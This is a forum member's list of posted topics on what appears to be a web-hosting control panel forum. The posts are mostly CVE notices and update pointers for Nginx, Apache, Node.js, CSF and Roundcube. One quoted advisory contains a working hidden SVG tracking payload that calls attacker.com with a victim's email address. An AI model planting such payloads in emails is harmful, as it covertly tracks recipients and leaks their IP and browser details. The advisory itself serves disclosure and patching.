Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Topics - Starburst

Pages: [1] 2 3 ... 9
1
Other / 9 CVE's just dropped for those running Node.js
« on: June 26, 2026, 03:48:16 AM »
I know Node.js isn't part of CWP, but I've seen people posting about it.

9 new CVE's just dropped for those running Node.js that are a wide range from DoS to Bypasses.

Reference: https://sysadmin.help/viewforum.php?f=80

2
CVE ID: CVE-2026-40519
Published: June 8, 2026
Description: Nginx Proxy Manager versions 2.9.14 through 2.15.1, fixed in commit a5db5ed, contain an authenticated remote code execution vulnerability via OS command injection in the setupCertbotPlugins() function in backend/setup.js, allowing attackers with certificates:manage permission to execute arbitrary commands by storing a malicious payload in the dns_provider_credentials field. The user-controlled dns_provider_credentials value is interpolated directly into a shell command executed via child_process.exec() without sanitization or escaping, causing the injected command to execute upon backend restart.
Severity: 7.7 | HIGH

Visit the link for more details, such as CVSS details, affected products, timeline, and more...
https://cvefeed.io/vuln/detail/CVE-2026-40519

3
Apache / 7 new CVE's for Apache. 2.4.68 Just Released
« on: June 08, 2026, 05:16:06 PM »
CISA Just release 7 new CVE's for Apache, that affect up to version 2.4.67

The Apache Foundation just release 2.4.68 that take care of the vulnerabilities.

Update guides, if needed can be found at:

HTTP/2 Version:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/update-apache-http-2-to-2-4-68-in-cwp-on-almalinux-8-9/

Non HTTP/2 Version:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/update-apache-to-2-4-68-in-cwp-on-almalinux-8-9/

4
CSF Firewall / FYI - OWASP CRS Ruleset v4.27.0
« on: June 03, 2026, 06:38:13 PM »
Just a quick FYI, if you are using the OWASP CRS ruleset with CSF, they released 4.27.0 on Monday (2026-06-01)

Also I try and keep any OWASP CRS security notifications at:
https://sysadmin.help/viewforum.php?f=43&sid=0fe95c9ec0fc6690ab773d6d681daed5

5
https://cybersecuritynews.com/http-2-bomb-remote-dos-exploit/

If you are running Apache <2.4.67 or Nginx <1.29.7, Please update ASAP.

6
Nginx / CVE-2026-9256 - NGINX ngx_http_rewrite_module vulnerability
« on: May 22, 2026, 07:07:23 PM »
CVE ID: CVE-2026-9256
Published: May 22, 2026
Description: NGINX Plus and NGINX Open Source have a vulnerability in the ngx_http_rewrite_module module.
Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Severity: 9.2 | CRITICAL

Visit the link for more details, such as CVSS details, affected products, timeline, and more...

https://cvefeed.io/vuln/detail/CVE-2026-9256

7
Nginx / CVE-2026-8711 - NGINX JavaScript vulnerability
« on: May 19, 2026, 06:13:48 PM »
CVE ID: CVE-2026-8711
Published: May 19, 2026, 3:16 p.m.
Description: NGINX JavaScript has a vulnerability when the js_fetch_proxy directive is configured with at least one client-controlled NGINX variable (for example, $http_*, $arg_*, $cookie_*) and a location invoking the ngx.fetch() operation from NGINX JavaScript. An unauthenticated attacker can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, for systems with Address Space Layout Randomization (ASLR) disabled, code execution is possible. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Severity: 9.2 | CRITICAL

Visit the link for more details, such as CVSS details, affected products, timeline, and more...

https://cvefeed.io/vuln/detail/CVE-2026-8711

I also try to keep updated CVE's pertaining to CWP at: https://sysadmin.help/viewforum.php?f=51

8
This CVE does NOT include/involve CWP, only the direct Nginx package.

⚠️ A heap-based buffer overflow in nginx’s ngx_http_rewrite_module, disclosed as CVE-2026-42945 and nicknamed NGINX Rift, allows an unauthenticated attacker to crash a worker process, or potentially achieve remote code execution on hosts with ASLR disabled, by sending a single crafted HTTP request.

If you operate an internet-facing nginx instance, especially one with non-trivial rewrite rules in front of a PHP or application backend, this matters.

AlmaLinux's core team has built patched nginx packages, which are available in their testing repository.
After the community has helped verify them, AlmaLinux will release them to the production repositories.

9
https://nvd.nist.gov/vuln/detail/CVE-2026-41940

And the workaround blocks ALL logins:

Quote
In the meantime, using a firewall to block access to TCP ports 2083/2087 will prevent unauthorized access, but would also restrict all other access to the control panel as well.

10
E-Mail / Roundcube Webmail Vulnerability Lets Attackers Track Email Opens
« on: February 09, 2026, 06:24:31 PM »
Source: Cyber Press https://cyberpress.org/roundcube-webmail-vulnerability-lets-attackers-track-email-opens/

In a sneaky bypass of email security features, a vulnerability in Roundcube Webmail exposes users to hidden tracking even when “Block remote images” is enabled.

Discovered during holiday tinkering, this issue (CVE-2026-25916) affects versions before 1.5.13 and 1.6.13.

Attackers can now confirm if you’ve opened their emails, logging your IP address and browser details without your knowledge.

The Problem in Plain Terms
Roundcube’s HTML sanitizer is like a bouncer at a club. It blocks external images in common spots: <img src>, <image href>, and <use href>.

These checks use a strict function called is_image_attribute() that rejects outside URLs when remote loading is off.

But the SVG element <feImage> slipped through. Its href attribute meant to pull in remote images for filters, gets treated as a harmless link instead.

The sanitizer routes it via wash_link(), which allows HTTP/HTTPS URLs. Result? Browsers fetch the attacker’s image invisibly, bypassing the block.

Security researcher “nullcathedral” spotted this while auditing recent SVG fixes in Roundcube’s rcube_washtml.php.

One SVG bug often hints at more, and <feImage> stood out because it renders like an <img> but dodges the image checks.

How Attackers Exploit It
Imagine receiving this malicious HTML in an email:

Code: [Select]
text<svg width="1" height="1" style="position:absolute;left:-9999px;">
  <defs>
    <filter id="t">
      <feImage href="https://attacker.com/track?email=victim@test.com" width="1" height="1"/>
    </filter>
  </defs>
  <rect filter="url(#t)" width="1" height="1"/>
</svg>

It’s a tiny, off-screen SVG. When rendered, the browser grabs the href image, pinging the attacker’s server.

No click required, just opening the email triggers it. Perfect for phishing campaigns or spam tracking.

CVE Details
Field   Value
CVE   CVE-2026-25916
Vendor   Roundcube
Product   Roundcube Webmail
Affected Versions   <1.5.13, <1.6.13
Disclosure Date   2026-02-08
Developers patched it swiftly. The update tweaks is_image_attribute() with a regex: ($attr == 'href' && preg_match('/^(feimage\|image\|use)$/i', $tag)). Now <feImage href> gets blocked like other images.

2026-01-04: Reported to Roundcube.
2026-02-08: Versions 1.5.13 and 1.6.13 released.
2026-02-09: CVE assigned.

11
For those running CentOS Stream 9, this is a Major Vulnerability.


New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root
Author image    Cyber Press ®
See: https://www.linkedin.com/pulse/new-centos-9-vulnerability-allows-attackers-escalate-privileges-a8xnc/


A newly identified privilege escalation flaw in CentOS Stream 9 has triggered significant security concerns within the Linux community.

The vulnerability, originating from a Use-After-Free (UAF) condition in the Linux kernel’s networking subsystem, allows a local user to escalate privileges to root.

The issue was spotlighted at the TyphoonPWN 2025 hacking competition, where it won first place in the Linux category.

Adding urgency, a Proof-of-Concept (PoC) exploit has been publicly released, enabling attackers to achieve full system compromise on vulnerable installations reliably.

Code: [Select]
cstatic s32 cake_enqueue(struct sk_buff *skb, struct Qdisc *sch,
            struct sk_buff **to_free)
{
    // ...
    if (q->buffer_used > q->buffer_limit) {                 // [1] Check buffer limit
        u32 dropped = 0;
        while (q->buffer_used > q->buffer_limit) {
            dropped++;
            cake_drop(sch, to_free);                        // [2] Packet is DROPPED here
        }
        b->drop_overlimit += dropped;
    }
    return NET_XMIT_SUCCESS;                                // [!] Returns SUCCESS anyway
}   
     

Root Cause in CAKE Scheduler

The flaw exists in the sch_cake (Common Applications Kept Enhanced) packet scheduler, a component responsible for managing network traffic shaping in the kernel.

The issue specifically lies in the cake_enqueue() function, which mishandles return codes during packet drops.

Under buffer pressure, CAKE discards packets using cake_drop(), yet incorrectly returns NET_XMIT_SUCCESS, indicating to upper layers that the packet was successfully queued.

12
E-Mail / RoundCube 1.5.12 Released
« on: December 22, 2025, 01:08:21 PM »

13
CSF Firewall / Continued CWP support with new CSF fork
« on: December 16, 2025, 11:39:59 PM »
A developer named Aetherinox has forked CSF, and is actively supporting it, along with updates for CWP.

Please see the following KB, if you would like to update to this new fork and version:

https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/aetherinox-csf-firewall-update-to-v15-09/

If you can, please support him also. ;)

14
Apache / Apache 2.4.66 released on 2025-12-04
« on: December 08, 2025, 01:15:48 PM »
For those who are using Apache, they released 2.4.66 on 2025-12-04


We've posted the new KB article and script to help admins update:

https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/update-apache-to-2-4-66-in-cwp-on-almalinux-8-9/

15
How to / Clear alerts & notifications from CLI?
« on: December 07, 2025, 10:56:31 PM »
Anyone know how to clear the Alerts & Notifications completely out from the CLI?

There is a scripts to add alerts, but didn't see any for read and/or clear.


Thanks

Pages: [1] 2 3 ... 9